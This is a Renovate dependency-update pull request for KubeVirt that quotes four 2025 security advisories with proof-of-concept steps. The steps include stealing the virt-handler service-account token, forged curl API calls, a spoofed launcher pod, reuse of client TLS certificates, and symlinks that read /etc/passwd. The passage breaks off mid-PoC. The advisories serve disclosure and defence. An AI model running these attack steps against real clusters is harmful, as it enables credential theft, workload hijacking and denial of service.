Skip to content

Conversation

@redhat-renovate-bot
Copy link
Collaborator

@redhat-renovate-bot redhat-renovate-bot commented Dec 4, 2025

This PR contains the following updates:

Package Type Update Change
kubevirt.io/kubevirt require minor v1.4.0 -> v1.7.0

GitHub Vulnerability Alerts

CVE-2025-64436

Summary

The permissions granted to the virt-handler service account, such as the ability to update VMI and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.

Details

Following the GitHub security advisory published on March 23 2023, a ValidatingAdmissionPolicy was introduced to impose restrictions on which sections of node resources the virt-handler service account can modify. For instance, the spec section of nodes has been made immutable, and modifications to the labels section are now limited to kubevirt.io-prefixed labels only. This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

However, if a virt-handler service account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably, virt-handler sets a specific kubevirt.io boolean label, kubevirt.io/schedulable, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label to false, thereby forcing all #acr("vmi") instances to be scheduled exclusively on the compromised node.

Another finding describes how a compromised virt-handler instance can perform operations on other nodes that are intended to be executed solely by virt-api. This significantly increases both the impact and the likelihood of the vulnerability being exploited

Additionally, by default, the virt-handler service account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet's NodeRestriction feature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.

PoC

By injecting incorrect data into a running VMI, for example, by altering the kubevirt.io/nodeName label to reference a different node, the VMI is marked as terminated and its state transitions to Succeeded. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker's choosing. As an example, the following demonstrates how to instantiate a basic VMI:

apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: testvm
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: testvm
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The VMI is then created on a minikube node identified with minikube-m02:

operator@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   20s   Running   10.244.1.8   minikube-m02   True

Assume that a virt-handler pod, running on node minikube-m03, is compromised and an attacker and the latter wants the testvm to be re-deployed on a controlled by them node.

First, we retrieve the virt-handler service account token in order to be able to perform requests to the Kubernetes API:

# Get the `virt-handler` pod name
attacker@minikube-m03:~$ kubectl get pods  -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler
virt-handler-kblgh               1/1     Running   0          8d

# get the `virt-handler` SA account token
attacker@minikube-m03:~$ token=$(kubectl exec -it virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token) 

The attacker updates the VMI object labels in a way that makes it terminate:

# Save the current state of the VMI
attacker@minikube-m03:~$ kubectl get vmi testvm -o json > testvm.json

# replace the current `nodeName` to another one in the JSON file
attacker@minikube-m03:~$ sed -i 's/"kubevirt.io\/nodeName": "minikube-m02"/"kubevirt.io\/nodeName": "minikube-m03"/g' testvm.json 

# Perform the UPDATE request, impersonating the virt-handler
attacker@minikube-m03:~$ curl https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm -k  -X PUT -d @​testvm.json -H "Content-Type: application/json" -H "Authorization: bearer $token"

# Get the current state of the VMI after the UPDATE
attacker@minikube-m03:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   42m   Running   10.244.1.8   minikube-m02   False # The VMI is not ready anymore

# Get the current state of the pod after the UPDATE
attacker@minikube-m03:~$ kubectl get pods | grep launcher
virt-launcher-testvm-z2fk4   0/3     Completed   0          44m  # the `virt-launcher` pod is completed

Now, the attacker can use the excessive permissions of the virt-handler service account to patch the minikube-m02 node in order to mark it as unschedulable for VMI workloads:

attacker@minikube-m03:~$ curl https://192.168.49.2:8443/api/v1/nodes/minikube-m03 -k -H "Authorization: Bearer $token" -H "Content-Type: application/strategic-merge-patch+json" --data '{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}' -X PATCH

Note: This request could require multiple invocations as the virt-handler is continuously updating the schedulable state of the node it is running on.

Finally, an admin user decides to restart the VMI:

admin@minikube:~$ kubectl delete -f testvm.yaml
admin@minikube:~$ kubectl apply -f testvm.yaml
admin@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP            NODENAME       READY
testvm   80s   Running   10.244.0.15   minikube-m03   True

Identifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the userInfo object, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes' NodeRestriction feature gate. Since Kubernetes version 1.32, the node authorization mode, enforced via the NodeRestriction admission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.

An alternative approach would be to create a dedicated virt-handler service account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from the userInfo.username field of the AdmissionRequest object. However, this method introduces additional operational overhead in terms of monitoring and maintenance.

Impact

This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

CVE-2025-64435

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

A logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

A vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate virt-launcher pod associated with the VMI.

The virt-launcher pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with virt-handler, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).

When virt-controller receives a notification about a change in a VMI's state, it attempts to identify the corresponding virt-launcher pod. This is necessary in several scenarios, including:

  • When hardware devices are requested to be hotplugged into the VMI—they must also be hotplugged into the associated virt-launcher pod.
  • When additional RAM is requested—this may require updating the virt-launcher pod's cgroups.
  • When additional CPU resources are added—this may also necessitate modifying the virt-launcher pod's cgroups.
  • When the VMI is scheduled to migrate to another node.

The core issue lies in the implementation of the GetControllerOf function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate virt-launcher, thereby compromising the VMI's integrity and control mechanisms.

//pkg/controller/controller.go

func CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {
	// Get all pods from the VMI namespace which contain the label "kubevirt.io"
	objs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)
	if err != nil {
		return nil, err
	}
	pods := []*k8sv1.Pod{}
	for _, obj := range objs {
		pod := obj.(*k8sv1.Pod)
		pods = append(pods, pod)
	}

	var curPod *k8sv1.Pod = nil
	for _, pod := range pods {
		if !IsControlledBy(pod, vmi) {
			continue
		}

		if vmi.Status.NodeName != "" &&
			vmi.Status.NodeName != pod.Spec.NodeName {
			// This pod isn't scheduled to the current node.
			// This can occur during the initial migration phases when
			// a new target node is being prepared for the VMI.
			continue
		}
		// take the most recently created pod
		if curPod == nil || curPod.CreationTimestamp.Before(&pod.CreationTimestamp) {
			curPod = pod
		}
	}
	return curPod, nil
}
// pkg/controller/controller_ref.go

// GetControllerOf returns the controllerRef if controllee has a controller,
// otherwise returns nil.
func GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {
	controllerRef := metav1.GetControllerOf(pod)
	if controllerRef != nil {
		return controllerRef
	}
	// We may find pods that are only using CreatedByLabel and not set with an OwnerReference
	if createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) > 0 {
		name := pod.Annotations[virtv1.DomainAnnotation]
		uid := types.UID(createdBy)
		vmi := virtv1.NewVMI(name, uid)
		return metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)
	}
	return nil
}

func IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {
	if controllerRef := GetControllerOf(pod); controllerRef != nil {
		return controllerRef.UID == vmi.UID
	}
	return false
}

The current logic assumes that a virt-launcher pod associated with a VMI may not always have a controllerRef. In such cases, the controller falls back to inspecting the pod's labels. Specifically it evaluates the kubevirt.io/created-by label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the virt-controller selects the most recently created one.

This logic appears to be designed with migration scenarios in mind, where it is expected that two virt-launcher pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate virt-launcher pod lacks a controllerRef and relies solely on labels (such as kubevirt.io/created-by) to indicate its association with a VMI.

This fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate virt-launcher pod. As a result, the CurrentVMIPod function could mistakenly return the attacker-controlled pod instead of the authentic one.

This vulnerability has at least two serious consequences:

  • The attacker could disrupt or seize control over the VMI's lifecycle operations.
  • The attacker could potentially influence the VMI's migration target node, bypassing node-level security constraints such as nodeSelector or nodeAffinity, which are typically used to enforce workload placement policies.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Consider the following VMI definition:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: launcher-label-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=
# Deploy the launcher-label-confusion VMI
operator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml

# Get the UID of the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.metadata.uid}'
18afb8bf-70c4-498b-aece-35804c9a0d11

# Find the UID of the associated to the VMI `virt-launcher` pods (ActivePods)
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"}

The UID of the VMI can also be found as an argument to the container in the virt-launcher pod:

# Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched
operator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath='{.spec.containers[0]}' | jq .
{
  "command": [
    "/usr/bin/virt-launcher-monitor",
    ...
    "--uid",
    "18afb8bf-70c4-498b-aece-35804c9a0d11", 
    "--namespace",
    "default",
    ...

Consider the following attacker-controlled pod which is associated to the VMI using the UID defined in the kubevirt.io/created-by label:

apiVersion: v1
kind: Pod
metadata:
  name: fake-launcher
  labels:
    kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components
    kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods
    kubevirt.io/domain: migration
spec:
  restartPolicy: Never
  containers:
    - name: alpine
      image: alpine
      command: [ "sleep", "3600" ]
operator@minikube:~$ kubectl apply -f fake-launcher.yaml

# Get the UID of the `fake-launcher` pod
operator@minikube:~$ kubectl get pod fake-launcher -o jsonpath='{.metadata.uid}'
39479b87-3119-43b5-92d4-d461b68cfb13

To effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:

# Trigger the VMI reconciliation loop
operator@minikube:~$ kubectl patch vmi launcher-label-confusion -p '{"metadata":{"annotations":{"trigger-annotation":"quarkslab"}}}' --type=merge
virtualmachineinstance.kubevirt.io/launcher-label-confusion patched

# Confirm that fake-launcher pod has been associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"39479b87-3119-43b5-92d4-d461b68cfb13":"minikube", # `fake-launcher` pod's UID
"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"} # original `virt-launcher` pod UID

To illustrate the impact of this vulnerability, a race condition will be triggered in the sync function of the VMI controller:

// pkg/virt-controller/watch/vmi.go

func (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {
  //...
  if !isTempPod(pod) && controller.IsPodReady(pod) {

		// mark the pod with annotation to be evicted by this controller
		newAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: ""}
		maps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))
    // here a new updated pod is returned
		patchedPod, err := c.syncPodAnnotations(pod, newAnnotations)
		if err != nil {
			return common.NewSyncError(err, controller.FailedPodPatchReason), pod
		}
		pod = patchedPod
    // ...

func (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {
	patchSet := patch.New()
	for key, newValue := range newAnnotations {
		if podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {
			patchSet.AddOption(
				patch.WithAdd(fmt.Sprintf("/metadata/annotations/%s", patch.EscapeJSONPointer(key)), newValue),
			)
		}
	}
	if patchSet.IsEmpty() {
		return pod, nil
	}
	
	patchBytes, err := patchSet.GeneratePayload()
	// ...
	patchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})
  // ...
	return patchedPod, nil
}

The above code adds additional annotations to the virt-launcher pod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.
There is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:

// pkg/virt-controller/watch/vmi.go

func isTempPod(pod *k8sv1.Pod) bool {
  // EphemeralProvisioningObject string = "kubevirt.io/ephemeral-provisioning"
	_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]
	return ok
}
// pkg/virt-controller/watch/vmi.go

func (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {
  // ...
  vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
	tempPodExists := controller.PodExists(pod) && isTempPod(pod)

  //...
  case vmi.IsRunning():
		if !vmiPodExists {
      // MK: this will toggle the VMI phase to Failed
			vmiCopy.Status.Phase = virtv1.Failed
			break
		}
    //...

  vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)
	if vmiChanged {
    // MK: this will detect that the phase of the VMI has changed and updated the resource
		key := controller.VirtualMachineInstanceKey(vmi)
		c.vmiExpectations.SetExpectations(key, 1, 0)
		_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})
		if err != nil {
			c.vmiExpectations.LowerExpectations(key, 1, 0)
			return err
		}
	}

To trigger it, the attacker should update the fake-launcher pod's annotations before the check vmiPodExists := controller.PodExists(pod) && !isTempPod(pod) in sync, and between the check if !isTempPod(pod) && controller.IsPodReady(pod) in sync but before the patch API call in syncPodAnnotations as follows:

annotations:
    kubevirt.io/ephemeral-provisioning: "true"

The above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).

The update should also happen during the reconciliation loop when the fake-launcher pod is initially going to be associated with the VMI and its labels, related to eviction, updated.

Upon successful exploitation the VMI is marked as failed and could not be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:

operator@minikube:~$ kubectl get vmi
NAME                       AGE    PHASE    IP            NODENAME   READY
launcher-label-confusion   128m   Failed   10.244.0.10   minikube   False

# The VMI is not reachable anymore 
operator@minikube:~$ virtctl console launcher-label-confusion
Operation cannot be fulfilled on virtualmachineinstance.kubevirt.io "launcher-label-confusion": VMI is in failed status

# The two pods are still associated with the VMI

operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}' 
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube","ca31c8de-4d14-4e47-b942-75be20fb9d96":"minikube"}

Impact

As a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.


KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt

CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107

More information

Details

KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt's Improper TLS Certificate Management Handling Allows API Identity Spoofing

CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107

More information

Details

Summary

Due to improper TLS certificate management, a compromised virt-handler could impersonate virt-api by using its own TLS credentials, allowing it to initiate privileged operations against another virt-handler.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

Because of improper TLS certificate management, a compromised virt-handler instance can reuse its TLS bundle to impersonate virt-api, enabling unauthorized access to VM lifecycle operations on other virt-handler nodes.
The virt-api component acts as a sub-resource server, and it proxies API VM lifecycle requests to virt-handler instances.
The communication between virt-api and virt-handler instances is secured using mTLS. The former acts as a client while the latter as the server. The client certificate used by virt-api is defined in the source code as follows and have the following properties:

//pkg/virt-api/api.go

const (
	...
	defaultCAConfigMapName     = "kubevirt-ca"
  ...
	defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
	defaultHandlerKeyFilePath  = "/etc/virt-handler/clientcertificates/tls.key"
)
##### verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

The virt-handler component verifies the signature of client certificates using a self-signed root CA. This latter is generated by virt-operator when the KubeVirt stack is deployed and it is stored within a ConfigMap in the kubevirt namespace. This configmap is used as a trust anchor by all virt-handler instances to verify client certificates.

##### inspect the self-signed root CA used to sign virt-api and virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138

The kubevirt-ca is also used to sign the server certificate which is used by a virt-handler instance:

admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

##### the virt-handler's server ceriticate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler

In addition to the validity of the signature, the virt-handler component also verifies the CN field of the presented certificate:

<code.sec.SetupTLSForVirtHandlerServer>

//pkg/util/tls/tls.go

func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
	// #nosec cause: InsecureSkipVerify: true
	// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed
	
	//...
				// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
				VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
					return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
				},
				//...
}

func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
  //...
	rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
	c, err := x509.ParseCertificate(rawPeer)
	//...
	fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
	if !externallyManaged && c.Subject.CommonName != fullCommonName {
		return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
	}
	//...

The above code illustrates that client certificates accepted be KubeVirt should have as CN kubevirt.io:system:client:virt-handler which is the same as the CN present in the virt-api's certificate. However, the latter is not the only component in the KubeVirt stack which can communicate with a virt-handler instance.

In addition to the extension API server, any other virt-handler can communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the virt-handlers on both nodes are going to use structures called ProxyManager to communicate back and forth on the state of the migration.

//pkg/virt-handler/migration-proxy/migration-proxy.go

func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
	return &migrationProxyManager{
		sourceProxies:   make(map[string][]*migrationProxy),
		targetProxies:   make(map[string][]*migrationProxy),
		serverTLSConfig: serverTLSConfig,
		clientTLSConfig: clientTLSConfig,
		config:          config,
	}
}

This communication follows a classical client-server model, where the virt-handler on the migration source node acts as a client and the virt-handler on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the virt-handler acting as a migration destination node is the same as the one which is used for the communication between the same virt-handler and the virt-api in the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by a virt-handler instance has the same CN as the client certificate used by virt-api.

admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

Although the migration procedure, where two separate virt-handler instances coordinate the transfer of a VM's state, is not directly tied to the communication between virt-api and virt-handler during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificate used by both virt-handler and virt-api shares the same CN field, despite the use of different, randomly allocated ports, for the two types of communication.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (minikube and minikube-m02) thus, with two virt-handler instances alongside a vmi running on one of the nodes. It is considered that an attacker has obtained access to the client certificate bundle used by the virt-handler instance running on the compromised node (minikube) while the virtual machine is running on the other node (minikube-m02). Thus, they can interact with the sub-resource API exposed by the other virt-handler instance and control the lifecycle of the VMs running on the other node:

##### the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
  kubevirt.io/size: small
  name: mishandling-common-name-in-certificate-handler
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=
##### the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0

##### get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'Name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')

attacker@minikube:~$ curl -k  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/
404: Page Not Found

##### soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot  -XPUT
HTTP/1.1 202 Accepted

##### the VMI mishandling-common-name-in-certificate-handler has been rebooted
Impact

What kind of vulnerability is it? Who is impacted?

Due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the managed by it VM.

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt

CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109

More information

Details

KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Arbitrary Container File Read

CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109

More information

Details

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

Mounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the virt-launcher pod. This is due to erroneous handling of symlinks defined within a PVC.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

A vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod's file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod's file system. Since libvirt can treat regular files as block devices, any file on the pod's file system that is symlinked in this way can be mounted into the VM and subsequently read.

Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (TODO: put link here). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod's file system or on a mounted PVC from within the guest VM.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Consider that an attacker has control over the contents of two PVC (e.g., from within a container) and creates the following symlinks:

##### The YAML definition of two PVCs that the attacker has access to
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-1
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-2
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---

##### The attacker-controlled container used to create the symlinks in the above PVCs
apiVersion: v1
kind: Pod
metadata:
  name: dual-pvc-pod
spec:
  containers:
  - name: app-container
    image: alpine
    command: ["/some-vulnerable-app"]
    volumeMounts:
    - name: pvc-volume-one
      mountPath: /mnt/data1
    - name: pvc-volume-two
      mountPath: /mnt/data2
  volumes:
  - name: pvc-volume-one
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-1
  - name: pvc-volume-two
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-2

By default, Minikube's storage controller (hostpath-provisioner) will allocate the claim as a directory on the host node (HostPath). Once the above Kubernetes resources are created, the user can create the symlinks within the PVC as follows:

##### Using the `pvc-arbitrary-container-read-1` PVC we want to read the default XML configuration generated by `virt-launcher` for `libvirt`. Hence, the attacker has to create a symlink including the name of the future VM which will be created using this configuration.

attacker@dual-pvc-pod:/mnt/data1 $ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img
attacker@dual-pvc-pod:/mnt/data1 $ls -l
lrwxrwxrwx    1 root     root            85 May 19 22:24 disk.img -> ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml

##### With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM
attacker@dual-pvc-pod:/mnt/data2 $ln -s ../../../../../../../../etc/passwd disk.img 
attacker@dual-pvc-pod:/mnt/data2 $ls -l
lrwxrwxrwx    1 root     root            34 May 19 22:26 disk.img -> ../../../../../../../../etc/passwd

Of course, these links could potentially be broken as the files, especially default_arbitrary-container-read.xml, could not exist on the dual-pvc-pod pod's file system. The attacker then deploy the following VM:

##### arbitrary-container-read.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-container-read
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
